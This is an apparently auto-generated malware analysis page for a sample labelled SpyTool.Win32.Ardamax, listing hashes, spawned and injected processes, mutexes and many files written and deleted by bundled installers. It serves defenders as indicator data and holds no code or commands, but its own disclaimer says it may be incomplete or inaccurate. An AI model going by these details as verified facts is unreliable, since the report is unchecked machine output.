SpyTool.Win32.Ardamax_d24f367079

SpyTool.Win32.Ardamax.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS) Behaviour: Trojan, SpyTool, VirTool The description has b...
Blog rating:3 out of5 with2 ratings

SpyTool.Win32.Ardamax_d24f367079

by malwarelabrobot on December 26th, 2015 in Malware Descriptions.

SpyTool.Win32.Ardamax.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, SpyTool, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: d24f367079cc483e84027cd8d8ae770d
SHA1: 2cb91143a03c7128be7754670107127a5617bfde
SHA256: f52cb8debcb07329b7b2e01e57fadd99633757cce40f3f8418b455446c56ac51
SSDeep: 98304:ArvQivPcXcXGwvBFFhAdaZuzVZb5qP18frmNfeZ4rzNJMp:wY NFhcVZby1krmNfH1J6
Size: 3839728 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, BorlandDelphi30, BorlandDelphiv30, ACProtect141
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit


Summary:

SpyTool. A program used to apply passive protection methods to spyware, such as obfuscation, encryption or polymorphism. The original malicious program is usually encrypted/compressed and stored inside the wrapper.

Payload

No specific payload has been found.

Process activity

The SpyTool creates the following process(es):

AmigoDistrib.exe:580
UnityWebPlayer.exe:1816
cd.exe:1568
cd.exe:1264
mailruhomesearchvbm.exe:2432
MailRuUpdater.exe:1632
MailRuUpdater.exe:916
MailRuUpdater.exe:1028
condefsetup (19).exe:348
amigo.exe:1388
setup.exe:1932
verclsid.exe:1568
mailruhomesearch.exe:1452

The SpyTool injects its code into the following process(es):

05a00036.exe:284
%original file name%.exe:560

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
RasPbFile
ShimCacheMutex
MutexNPA_UnitVersioning_560

File activity

The process AmigoDistrib.exe:580 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CR_2BA30.tmp\CHROME.PACKED.7Z (366388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_2BA30.tmp\SETUP.EX_ (1659 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_2BA30.tmp\setup.exe (17080 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CR_2BA30.tmp\CHROME.PACKED.7Z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_2BA30.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_2BA30.tmp\SETUP.EX_ (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_2BA30.tmp\setup.exe (0 bytes)

The process UnityWebPlayer.exe:1816 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\npUnity3D32.dll (32784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\info.plist (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\Uninstall.exe (6078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr3.tmp (67936 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\UnityWebPlayerUpdate.exe (19592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\UnityBugReporter.exe (25112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp\UAC.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\UnityWebPlayerNP.map (12536 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp\System.dll (0 bytes)

The process cd.exe:1264 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):

%Program Files%\Content Defender\cert\SSL\ContentDefender 2.cer (774 bytes)
%Program Files%\Content Defender\cert\SSL\cert.db (2 bytes)

The process mailruhomesearchvbm.exe:2432 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Favorites\Mail.Ru Агент - используй для общения!.url (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\GoMailRu.ico (14076 bytes)
%Documents and Settings%\All Users\Favorites\Mail.Ru.url (152 bytes)
%Documents and Settings%\%current user%\Desktop\Искать в Интернете.url (209 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\Sputnik\MailRu.ico (14076 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\Sputnik\Report\3DD21 (792 bytes)
%System%\GroupPolicy\gpt.ini (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Mail.Ru.lnk (1 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Mail.Ru.lnk (0 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EF13432694FC46EA8617DAF35215AB25.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\E78A4049BECF4E328AC8A3C930A9322F.html (0 bytes)

The process MailRuUpdater.exe:1632 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):

%System%\GroupPolicy\gpt.ini (90 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\074D8D1D6D244138A72893E0E92ECE2B.html (0 bytes)

The process MailRuUpdater.exe:916 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):

%Program Files%\Mail.Ru\MailRuUpdater\MailRuUpdater.exe (39945 bytes)
%Documents and Settings%\%current user%\Application Data\MailProducts\Id (38 bytes)
%Documents and Settings%\All Users\Application Data\Mail.Ru\Id (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe (39945 bytes)

The process MailRuUpdater.exe:1028 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):

%System%\GroupPolicy\User\Registry.pol (8 bytes)
%System%\GroupPolicy\gpt.ini (65 bytes)
%System%\GroupPolicy\Machine\Registry.pol (8 bytes)

The process %original file name%.exe:560 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\503031B8-564A-4828-993D-4F6CC32B108C\condefsetup (19).exe (39950 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\AFBFDDD2-8547-49D1-8A41-B824ECBC9A42\05a00036.exe (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\62628F9A-B2BE-4252-8717-CB1BCEA9FE66\mailruhomesearch.exe (30622 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4B259EC6-7CC5-491E-8AEF-D3E124038DAA\mailruhomesearchvbm.exe (30622 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\65025299-7BA0-4969-BF1C-4323DC267C7A\AmigoDistrib.exe (370096 bytes)

The process condefsetup (19).exe:348 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\condefclean.exe (7716 bytes)
%Program Files%\Content Defender\nfregdrv.exe (601 bytes)
%Program Files%\Content Defender\nss\smime3.dll (601 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\ssleay32.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\smime3.dll (7716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_i386.sys (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\softokn3.dll (4061 bytes)
%Program Files%\Content Defender\ContentDefenderPS.dll (13 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\libeay32.dll (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe (10588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\import_root_cert.exe (941 bytes)
%Program Files%\Content Defender\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_amd64.sys (58 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys (3516 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\cd.exe (6341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plds4.dll (17 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\condefclean.exe (7716 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\import_root_cert.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ssleay32.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\ContentDefender.zip (37274 bytes)
%Program Files%\Content Defender\nss\softokn3.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__amd64.sys (61 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll (6116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plc4.dll (20 bytes)
%System%\drivers\condef.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\condefclean.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\condefclean.exe (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss (4 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__i386.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\smime3.dll (7716 bytes)
%Program Files%\Content Defender\nss\mozcrt19.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderPS.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\libeay32.dll (86270 bytes)
%Program Files%\Content Defender\nss\nspr4.dll (673 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\libeay32.dll (11493 bytes)
%Program Files%\Content Defender\import_root_cert.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll (484 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nfregdrv.exe (9476 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys (4356 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nfregdrv.exe (9196 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nss3.dll (24908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\certutil.exe (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\cd.exe (41084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_i386.sys (48 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ssleay32.dll (26028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nss3.dll (4061 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\smime3.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plc4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32 (4 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\cd.exe (34724 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys (4356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\softokn3.dll (4061 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\certutil.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__i386.sys (56 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64 (4 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\libeay32.dll (156321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\libeay32.dll (20400 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ssleay32.dll (32684 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ssleay32.dll (4861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\smime3.dll (941 bytes)
%Program Files%\Content Defender\nss\certutil.exe (601 bytes)
%Program Files%\Content Defender\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nss3.dll (24908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderPS.dll (13 bytes)
%Program Files%\Content Defender\ConDefSetup.exe (41656 bytes)
%Program Files%\Content Defender\condefclean.exe (601 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe (8836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\cd.exe (5381 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Content Defender\Settings.lnk (804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_amd64.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nss3.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plc4.dll (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys (3516 bytes)
%Program Files%\Content Defender\nss\nss3.dll (2105 bytes)
%Program Files%\Content Defender\ContentDefenderControl.exe (673 bytes)
%Program Files%\Content Defender\cd.exe (3073 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plds4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nfregdrv.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ssleay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\condefclean.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nss3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nfregdrv.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\ContentDefender.zip (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\certutil.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\smime3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plds4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\118[1] (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\certutil.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\import_root_cert.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nss3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\cd.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ssleay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\smime3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\condefclean.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__i386.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plc4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\libeay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plc4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32 (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64 (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\libeay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\cd.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\import_root_cert.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys (0 bytes)

The process amigo.exe:1388 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\User Data\1.tmp (935 bytes)

The process setup.exe:1932 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\mg.exe (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\VisualElementsManifest.xml (396 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Вконтакте.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\el.pak (1747 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amigo_FFA3C3E0-B3B6-4D8C-928C-75AA59A806A0\UnityWebPlayer.exe (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\PepperFlash\manifest.json (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\natives_blob.bin (1677 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin (4 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Интернет.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\PepperFlash\pepflashplayer.dll (122658 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amigo_FFA3C3E0-B3B6-4D8C-928C-75AA59A806A0\MailRuUpdater.exe (39945 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Одноклассники.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\en-GB.pak (212 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Одноклассники.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\libegl.dll (81 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\hu.pak (272 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\pt-BR.pak (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\uk.pak (1689 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\am.pak (1639 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\VisualElements\splash-620x300.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\fa.pak (1648 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Вконтакте.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ro.pak (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\id.pak (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\resources.pak (142877 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\es-419.pak (259 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ms.pak (234 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\sk.pak (266 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\44.4.2403.3.manifest (248 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\vk.exe (673 bytes)
%Documents and Settings%\%current user%\Desktop\Вконтакте.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\VisualElements\smalllogo.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\mr.pak (1801 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ml.pak (3735 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\sl.pak (241 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\mailruupdater.exe (38588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\chrome_installer.log (972 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\mg.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\he.pak (296 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\chrome_elf.dll (132 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\th.pak (1789 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\secondarytile.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\metro_driver.dll (1763 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\44.4.2403.3\Installer\setup.exe (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\amigo.exe (3765 bytes)
